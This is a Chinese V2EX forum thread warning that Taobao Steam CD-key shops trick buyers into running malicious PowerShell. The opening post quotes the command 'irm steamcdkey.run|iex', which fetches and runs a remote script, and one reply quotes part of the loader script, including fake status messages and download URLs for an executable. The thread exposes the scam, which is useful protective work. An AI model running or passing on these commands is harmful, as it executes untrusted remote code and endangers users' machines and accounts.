世风日下，淘宝 steam 店铺怎么都变成盗号的了？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个创建于 396 天前的主题，其中的信息可能已经有所发展或是发生改变。

我好几年没怎么玩 steam 了。最近想玩一个小清新的游戏。就去淘宝买了。结果发现巨便宜。但是按照我往年的经验无非是外区 key 。或者是早期开发者内测低价囤积的那种 key 吧。。然后发现他的激活步骤。。是如下。。

Steam CDKey 激活方法：第一步：按住 win+x ，找到 powershell （管理员）（ A ）

第二步：输入 irm steamcdkey.run|iex （切记要复制，不要手动输入，不要复制前后字符或空格），按回车。

但凡不是智障都知道第二步是不存在的。而且是直接执行脚本的恶意行为。我 censys 看了一下。fofa 也看了一下。他这个地址如果直接访问是 302 到 steam 官方。这样普通人肯定以为是真的。。哎。

然后我又试了一家店铺。差不多价格的。也是这样的结果。然后我看了一眼所有的店铺类似价格的。有差不多十家店铺。都是销量很大。基本上可以肯定是全是骗子了。然后 b 站有一个类似的帖子。明确了这些骗术确实存在不少时间了。

真的太离谱了。虽然没有被坑到。但是我的账户理论上有差不多 40w 的价值，早就远超立案标准了。已经在咨询 w 安是否立案了。感觉很不爽。虽然没有几个钱。反正就想搞他们一波。

淘宝

Steam

骗子

20 条回复 • 2024-07-13 22:42:33 +08:00

HojiOShi

2024-07-13 13:41:15 +08:00

不知道，我是直接在 steam 上买的。这种要现金交易的平台为什么要过他人之手？

loveqianool

2024-07-13 13:50:00 +08:00 via Android

# display Message
Write-Host " [STEAM] App is ready for run .please wait... "
Write-Host " [STEAM] Windows Defender has been clear "
Write-Host " [STEAM] Ready to go !!! "
Write-Host " [STEAM] watiing 1-3min "
# download file and process
$appStorePath = Join-Path $steamPath "steamworkz.exe"
$downloadUrl = "http://by.haory.cn/1/1129/Steamworkz.exe"
$backupUrl = "http://by.haory.cn/1/1129/steamworkz.exe"

loveqianool

2024-07-13 13:52:55 +08:00 via Android

cn 域名不是都要备案吗，还敢用来搞这个。

mikaelson

2024-07-13 13:59:41 +08:00

只买发 key 的

xzysaber

2024-07-13 14:04:12 +08:00

这是假入库，最近 Steam 要严打这个了，赶紧处理下，不要账号红信了。

Peek

2024-07-13 14:06:37 +08:00

@HojiOShi steam 上很多洗钱的，就是加密货币套现，所以有折上折的消费方式

drymonfidelia

2024-07-13 14:11:45 +08:00 via iPhone

@xzysaber 假入库好像只中间人改服务器响应内容，插入游戏信息，服务器端发现不了

loopinfor

2024-07-13 14:12:36 +08:00

我的经验是不管线下线上，没有实际交易的就不会立案

InDom

2024-07-13 14:17:37 +08:00

能不能让那些山西的脚本小子们用 http://by.haory.cn/1/1129/Steamworkz.exe 这个来刷流量啊？

yyzh

2024-07-13 14:20:37 +08:00 via Android

@johnjiang85 steamcdkey.run 这个域名应该是托管在 dnspod 的?

dearmymy

2024-07-13 14:28:37 +08:00

不是的，这个是他们共享 key ，但是下载恶意脚本危害很大。
具体分析看雪有人完整分析了。

https://bbs.kanxue.com/thread-279738.htm

dearmymy

2024-07-13 14:38:42 +08:00

@dearmymy 好像是假入库，我还以为跟 appstore 共享软件原理。。。

1KTN90lKW9gVJ9vX

2024-07-13 15:35:47 +08:00 via Android

@loveqianool cn 域名不需要备案都可以用的，用香港服务器就行，

xiaochen3

2024-07-13 15:36:20 +08:00

这是伪入库，淘宝还是做生意为主，怎么可能都在盗号。

JensenQian

2024-07-13 15:40:31 +08:00 via Android

假入库啊，很久了
这种真不如直接玩盗版

MisakiYui

2024-07-13 15:47:28 +08:00 via Android

确实很恶心，一堆假入库的店铺在骗人

hafuhafu

2024-07-13 16:00:49 +08:00

假入库，远程下载脚本并执行，仍然有很多小白贪小便宜上当，花钱买盗版了属于是，而且还很危险...
按目前见过的案例，有的假入库后 steam 还会被注入，启动 steam 后会弹淘宝店伪装的广告。
想省钱要么正规平台比如小黑盒这种买 key ，要么倒余额了。
相比各个平台价格还便宜到离谱的基本上都是坑。

PrinceofInj

2024-07-13 19:03:39 +08:00

不是盗号。但是这种情况跟盗号就是网站主改一下脚本的问题。

SkywalkerJi

2024-07-13 20:16:45 +08:00

@drymonfidelia #7
能不能发现是一说。主要是最近 steam 已经修改了用户协议，现在注入或者修改 steam 客户端 v 社可以直接封号。未来客户端进行联网验证也不是不可能。

92DISPfZMyn9IZaw

2024-07-13 22:42:33 +08:00

细说四十万